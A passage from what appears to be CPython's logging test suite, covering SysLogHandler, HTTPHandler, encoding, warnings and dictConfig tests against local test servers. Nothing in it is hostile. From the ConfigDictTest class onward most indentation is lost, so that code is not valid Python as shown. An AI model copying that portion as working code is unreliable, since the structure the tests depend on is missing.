        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        DatagramHandlerTest.setUp(self)

    def tearDown(self):
        DatagramHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        os_helper.unlink(self.address)
@support.requires_working_socket()
class SysLogHandlerTest(BaseTest):

    """Test for SysLogHandler using UDP."""

    server_class = TestUDPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a UDP server to receive log messages, and a SysLogHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sl_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SysLogHandler
        if isinstance(server.server_address, tuple):
            self.sl_hdlr = hcls((server.server_address[0], server.port))
        else:
            # AF_UNIX: server_address is a filesystem path; no port.
            self.sl_hdlr = hcls(server.server_address)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sl_hdlr)
        # Set once per datagram received by handle_datagram().
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the server."""
        try:
            if self.server:
                self.server.stop()
            if self.sl_hdlr:
                self.root_logger.removeHandler(self.sl_hdlr)
                self.sl_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # Syslog packets are raw bytes; keep the most recent one.
        self.log_output = request.packet
        self.handled.set()

    def test_output(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # The log message sent to the SysLogHandler is properly received.
        logger = logging.getLogger("slh")
        logger.error("sp\xe4m")
        self.handled.wait()
        # <11> is PRI for facility LOG_USER, severity ERROR; message is
        # UTF-8 encoded and NUL-terminated by default.
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
        self.handled.clear()
        self.sl_hdlr.append_nul = False
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
        self.handled.clear()
        self.sl_hdlr.ident = "h\xe4m-"
        logger.error("sp\xe4m")
        self.handled.wait()
        self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')

    def test_udp_reconnection(self):
        # Closing the handler must not prevent a subsequent emit from
        # reopening the socket and sending successfully.
        logger = logging.getLogger("slh")
        self.sl_hdlr.close()
        self.handled.clear()
        logger.error("sp\xe4m")
        # A fixed 0.1s timeout made this test flaky on slow or loaded
        # machines: the datagram may not have arrived yet when the
        # assertion runs.  Wait generously instead - the event-based
        # design means success never actually takes this long.
        self.handled.wait(support.LONG_TIMEOUT)
        self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):

    """Test for SysLogHandler with Unix sockets."""

    if hasattr(socket, "AF_UNIX"):
        # Only resolvable on platforms that provide AF_UNIX.
        server_class = TestUnixDatagramServer

    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SysLogHandlerTest.setUp(self)

    def tearDown(self):
        SysLogHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        os_helper.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
                     'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):

    """Test for SysLogHandler with IPv6 host."""

    server_class = TestUDPServer
    address = ('::1', 0)

    def setUp(self):
        # Temporarily switch the shared server class to IPv6 for the
        # duration of this test.
        self.server_class.address_family = socket.AF_INET6
        super().setUp()

    def tearDown(self):
        # Restore the default IPv4 family so other tests are unaffected.
        self.server_class.address_family = socket.AF_INET
        super().tearDown()
@support.requires_working_socket()
class HTTPHandlerTest(BaseTest):
    """Test for HTTPHandler."""

    def setUp(self):
        """Set up an HTTP server to receive log messages, and a HTTPHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        self.handled = threading.Event()

    def handle_request(self, request):
        # Runs on the server thread: capture method, URL and POST body so
        # the test can assert on them, then acknowledge the request.
        self.command = request.command
        self.log_data = urlparse(request.path)
        if self.command == 'POST':
            try:
                rlen = int(request.headers['Content-Length'])
                self.post_data = request.rfile.read(rlen)
            except Exception:
                # Best-effort: a missing/garbled body just yields None.
                # (Previously a bare ``except:``, which would also have
                # swallowed SystemExit and KeyboardInterrupt.)
                self.post_data = None
        request.send_response(200)
        request.end_headers()
        self.handled.set()

    def test_output(self):
        # The log message sent to the HTTPHandler is properly received.
        logger = logging.getLogger("http")
        root_logger = self.root_logger
        root_logger.removeHandler(self.root_logger.handlers[0])
        for secure in (False, True):
            addr = ('localhost', 0)
            if secure:
                try:
                    import ssl
                except ImportError:
                    sslctx = None
                else:
                    here = os.path.dirname(__file__)
                    localhost_cert = os.path.join(here, "keycert.pem")
                    sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                    sslctx.load_cert_chain(localhost_cert)

                    context = ssl.create_default_context(cafile=localhost_cert)
            else:
                sslctx = None
                context = None
            self.server = server = TestHTTPServer(addr, self.handle_request,
                                                  0.01, sslctx=sslctx)
            server.start()
            server.ready.wait()
            host = 'localhost:%d' % server.server_port
            secure_client = secure and sslctx
            self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
                                                       secure=secure_client,
                                                       context=context,
                                                       credentials=('foo', 'bar'))
            self.log_data = None
            root_logger.addHandler(self.h_hdlr)

            for method in ('GET', 'POST'):
                self.h_hdlr.method = method
                self.handled.clear()
                msg = "sp\xe4m"
                logger.error(msg)
                self.handled.wait()
                self.assertEqual(self.log_data.path, '/frob')
                self.assertEqual(self.command, method)
                if method == 'GET':
                    d = parse_qs(self.log_data.query)
                else:
                    d = parse_qs(self.post_data.decode('utf-8'))
                self.assertEqual(d['name'], ['http'])
                self.assertEqual(d['funcName'], ['test_output'])
                self.assertEqual(d['msg'], [msg])

            self.server.stop()
            self.root_logger.removeHandler(self.h_hdlr)
            self.h_hdlr.close()
class MemoryTest(BaseTest):
    """Test memory persistence of logger objects."""

    def setUp(self):
        """Create a dict to remember potentially destroyed objects."""
        BaseTest.setUp(self)
        self._survivors = {}

    def _watch_for_survival(self, *args):
        """Register weak references to *args* so survival can be checked."""
        for watched in args:
            self._survivors[id(watched), repr(watched)] = weakref.ref(watched)

    def _assertTruesurvival(self):
        """Assert that all objects watched for survival have survived."""
        # Trigger cycle breaking.
        gc.collect()
        dead = [text for (_, text), ref in self._survivors.items()
                if ref() is None]
        if dead:
            self.fail("%d objects should have survived "
                      "but have been destroyed: %s" % (len(dead), ", ".join(dead)))

    def test_persistent_loggers(self):
        # Logger objects are persistent and retain their configuration, even
        # if visible references are destroyed.
        self.root_logger.setLevel(logging.INFO)
        foo = logging.getLogger("foo")
        self._watch_for_survival(foo)
        foo.setLevel(logging.DEBUG)
        self.root_logger.debug(self.next_message())
        foo.debug(self.next_message())
        self.assert_log_lines([('foo', 'DEBUG', '2')])
        del foo
        # foo has survived.
        self._assertTruesurvival()
        # foo has retained its settings.
        bar = logging.getLogger("foo")
        bar.debug(self.next_message())
        self.assert_log_lines([('foo', 'DEBUG', '2'),
                               ('foo', 'DEBUG', '3')])
class EncodingTest(BaseTest):
    """Tests that handlers honor the requested text encoding."""

    def test_encoding_plain_file(self):
        # In Python 2.x, a plain file object is treated as having no encoding.
        log = logging.getLogger("test")
        fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
        os.close(fd)
        # the non-ascii data we write to the log.
        data = "foo\x80"
        try:
            handler = logging.FileHandler(fn, encoding="utf-8")
            log.addHandler(handler)
            try:
                # write non-ascii data to the log.
                log.warning(data)
            finally:
                log.removeHandler(handler)
                handler.close()
            # check we wrote exactly those bytes, ignoring trailing \n etc
            # (``with`` replaces the original manual try/finally close).
            with open(fn, encoding="utf-8") as f:
                self.assertEqual(f.read().rstrip(), data)
        finally:
            if os.path.isfile(fn):
                os.remove(fn)

    def test_encoding_cyrillic_unicode(self):
        log = logging.getLogger("test")
        # Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
        message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
        # Ensure it's written in a Cyrillic encoding
        writer_class = codecs.getwriter('cp1251')
        writer_class.encoding = 'cp1251'
        stream = io.BytesIO()
        writer = writer_class(stream, 'strict')
        handler = logging.StreamHandler(writer)
        log.addHandler(handler)
        try:
            log.warning(message)
        finally:
            log.removeHandler(handler)
            handler.close()
        # check we wrote exactly those bytes, ignoring trailing \n etc
        s = stream.getvalue()
        # Compare against what the data should be when encoded in CP-1251
        self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
    """Tests for logging.captureWarnings() integration."""

    def test_warnings(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            warnings.filterwarnings("always", category=UserWarning)
            buffer = io.StringIO()
            handler = logging.StreamHandler(buffer)
            warn_logger = logging.getLogger("py.warnings")
            warn_logger.addHandler(handler)
            warnings.warn("I'm warning you...")
            warn_logger.removeHandler(handler)
            captured = buffer.getvalue()
            handler.close()
            self.assertGreater(captured.find("UserWarning: I'm warning you...\n"), 0)

            # See if an explicit file uses the original implementation
            explicit = io.StringIO()
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
                                 explicit, "Dummy line")
            written = explicit.getvalue()
            explicit.close()
            self.assertEqual(written,
                             "dummy.py:42: UserWarning: Explicit\n Dummy line\n")

    def test_warnings_no_handlers(self):
        with warnings.catch_warnings():
            logging.captureWarnings(True)
            self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: no loggers are set
            warn_logger = logging.getLogger("py.warnings")
            self.assertEqual(warn_logger.handlers, [])
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
            # capture machinery adds a NullHandler on demand
            self.assertEqual(len(warn_logger.handlers), 1)
            self.assertIsInstance(warn_logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
    """Factory used by dictConfig tests: build a plain logging.Formatter.

    Parameter names must stay as-is; dictConfig passes them by keyword.
    """
    formatter = logging.Formatter(format, datefmt)
    return formatter
class myCustomFormatter:
    """A formatter-like class that is *not* a logging.Formatter subclass.

    Used to check that dictConfig rejects it as a 'class' entry when
    validation applies.
    """

    def __init__(self, fmt, datefmt=None):
        # Deliberately ignores its arguments.
        pass
def handlerFunc():
    """Factory used by dictConfig tests: build a default StreamHandler."""
    return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
    """StreamHandler subclass referenced by name in config5/config6."""
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
    """Apply the dict *conf* via logging.config.dictConfig()."""
    logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
    # '.' properties in config14 must be set as plain attributes on the
    # constructed handler.
    with support.captured_stdout() as output:
        self.apply_config(self.config14)
        # NOTE(review): reaches into the private logging._handlers map to
        # look up the configured handler by name -- confirm this private
        # API remains stable.
        h = logging._handlers['hand1']
        self.assertEqual(h.foo, 'bar')
        self.assertEqual(h.terminator, '!\n')
        logging.warning('Exclamation')
        self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
